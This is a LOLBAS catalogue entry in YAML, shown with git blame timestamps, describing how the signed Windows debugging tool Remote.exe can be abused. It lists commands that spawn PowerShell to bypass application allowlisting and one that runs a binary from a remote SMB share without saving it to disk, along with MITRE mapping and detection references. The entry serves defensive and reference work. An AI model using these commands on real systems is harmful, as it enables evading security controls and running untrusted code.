LOLBAS/yml/OtherMSBinaries/Remote.yml

41 lines
1.5 KiB
YAML
Raw Normal View History

2021-01-07 02:48:25 +01:00
---
Name: Remote.exe
2021-01-07 05:31:01 +01:00
Description: Debugging tool included with Windows Debugging Tools
2021-01-07 02:48:25 +01:00
Author: mr.d0x
2021-11-05 19:58:26 +01:00
Created: 2021-06-01
2021-01-07 02:48:25 +01:00
Commands:
- Command: Remote.exe /s "powershell.exe" anythinghere
Description: Spawns powershell as a child process of remote.exe
2021-11-05 19:58:26 +01:00
Usecase: Executes a process under a trusted Microsoft signed binary
2021-01-07 02:48:25 +01:00
Category: AWL Bypass
Privileges: User
MitreID: T1127
2022-09-11 06:22:36 +02:00
OperatingSystem: Windows
2021-01-07 02:48:25 +01:00
- Command: Remote.exe /s "powershell.exe" anythinghere
Description: Spawns powershell as a child process of remote.exe
Usecase: Executes a process under a trusted Microsoft signed binary
Category: Execute
Privileges: User
MitreID: T1127
2022-09-11 06:22:36 +02:00
OperatingSystem: Windows
2021-01-07 02:48:25 +01:00
- Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere
Description: Run a remote file
2021-01-07 05:31:01 +01:00
Usecase: Executing a remote binary without saving file to disk
2021-01-07 02:48:25 +01:00
Category: Execute
Privileges: User
MitreID: T1127
2022-09-11 06:22:36 +02:00
OperatingSystem: Windows
2021-01-07 02:48:25 +01:00
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe
2021-11-05 19:58:26 +01:00
Code_Sample:
- Code:
Detection:
- IOC: remote.exe process spawns
- Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml
2021-01-07 02:48:25 +01:00
Resources:
- Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/
Acknowledgement:
- Person: mr.d0x
Handle: '@mrd0x'